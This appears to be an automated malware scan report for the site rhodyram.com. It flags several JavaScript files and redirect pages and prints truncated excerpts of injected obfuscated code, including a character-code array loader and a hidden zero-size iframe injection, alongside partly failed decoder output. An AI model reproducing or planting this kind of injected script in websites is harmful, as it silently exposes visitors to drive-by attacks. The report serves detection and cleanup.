Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rhodyram.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rhodyram.com/ | 200 OK Content-Length: 5431 Content-Type: text/html | clean |
http://rhodyram.com/js/rollover.js | 200 OK Content-Length: 9497 Content-Type: application/x-javascript | malicious |
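Malicious code - confirmed by antiviruses (see below). The excerpt is truncated by the scanner: it appears to show the start of the file and then its last bytes, `if(f)e(s);}`. The same trailing fragment closes every script flagged on this page, which suggests one common block appended to otherwise ordinary site scripts, so each flagged file should be compared against a known-good copy.
Excerpt: var imageBlock = new Image(); imageBlock['rest-off'] = "/images/leftmenu/menu_rest_off.gif"; imageBlock['rest-over'] = "/images/leftmenu/menu_rest_over.gif"; imageBlock['hunt-off'] = "/images/leftmenu/menu_hunt_off.gif"; imageBlock['hunt-over'] = "/images/leftmenu/menu_hunt_over.gif"; imageBlock['school-off'] = "/images/leftmenu/menu_school_off.gif"; imageBlock['school-over'] = "/images/leftmenu/menu_school_over.gif"; imageBlock['skiing-off'] = "/images/leftmenu/menu_ if(f)e(s);}
Antivirus reports: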
http://rhodyram.com/js/AC_OETags.js | 200 OK Content-Length: 14998 Content-Type: application/x-javascript | malicious |
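Malicious code - confirmed by antiviruses (see below). Excerpt (truncated by the scanner): var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) if(f)e(s);}
Decoded script (the run of `j%2` tokens looks like failed decoder output rather than script content; the readable tail that follows shows the end of a block that sets an iframe's height to zero, hides it and appends it to document.body, i.e. a hidden-iframe injection, and then one step of a Lehmer-style pseudo-random generator written in Schrage's form, where what the generated values feed is not visible in this excerpt; the same decoded tail is repeated for js/swfobject.js, js/IE7_0_9/ie7-standard-p.js and js/ieupdate.js): j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports: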
http://rhodyram.com/js/swfobject.js | 200 OK Content-Length: 16762 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) { if (!document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectflash'; this.skipDetect = deconcept.util.getReques if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
http://rhodyram.com/js/IE7_0_9/ie7-standard-p.js | 200 OK Content-Length: 32263 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y(!26.1F)11 7(){2C{26.1F=8;6 2s=8.24=11 3b;8.1g=7(){z"1F 4x 0.9 (ad)"};6 5T=/5T/.Z(2y.5h.7C);6 31=(5T)?7(m){26.31(1F+"\\n\\n"+m)}:2s;6 29=ac.29.19(/ab (\\d\\.\\d)/)[1]; if(f)e(s);} Decoded script: if(!window.IE7)new function(){try{window.IE7=this;var DUMMY=this.addModule=new Function;this.toString=function(){return"IE7 version 0.9 (alpha)"};var ie7_debug=/ie7_debug/.test(top.location.search);var alert=(ie7_debug)?function(m){window.alert(IE7+"\n\n"+m)}:DUMMY;var appVersion=navigator.appVersion.match(/MSIE (\d\.\d)/)[1];var quirksMode=document.compatMode!="CSS1Compat";if(/ie7_off/.test(top.location.search)||appVersion<5||!/^ms_/.test(document.documentElement.uniqueID))return;var co ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://rhodyram.com/js/ieupdate.js | 200 OK Content-Length: 7586 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) objects = document.getElementsByTagName("object"); for (var i = 0; i < objects.length; i++) { objects[i].outerHTML = objects[i].outerHTML; } try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,16 if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
http://rhodyram.com/?redirect=6 | 200 OK Content-Length: 4391 Content-Type: text/html | malicious |
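Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=419 This URL is marked by Google as suspicious. Note that the frame is full-size (690x600) and points to the site's own gallery on www.rhodyram.com, so the finding appears to follow from the Safe Browsing listing of the target URL rather than from a hidden or off-site frame; the same applies to the other ?redirect= pages listed below. <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=419" style="border: 0px solid #aaa;"> | ||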
http://rhodyram.com/?redirect=7 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3379 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3379" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=8 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3374 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3374" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=9 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3381 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3381" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=10 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3387 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3387" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=14 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3385 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3385" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=11 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3389 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3389" style="border: 0px solid #aaa;"> | ||
http://rhodyram.com/?redirect=12 | 200 OK Content-Length: 4392 Content-Type: text/html | malicious |
Malicious iFrame found. size: 690x600 src: http://www.rhodyram.com/gallery2/main.php?g2_itemid=3383 This URL is marked by Google as suspicious <iframe width="690" height="600" frameborder="no" scrolling="auto" src="http://www.rhodyram.com/gallery2/main.php?g2_itemid=3383" style="border: 0px solid #aaa;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rhodyram.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Jan 2015 01:10:32 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 5431
Content-Type: text/html
X-Powered-By: PHP/5.1.6
...5431 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rhodyram.com
Referer: http://www.google.com/search?q=rhodyram.com
Result:
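The result is similar to the first query. No suspicious redirects were found. This check varies only the Referer header, so a redirect conditioned on other request properties (for example the User-Agent or the client IP address) would not be detected by it.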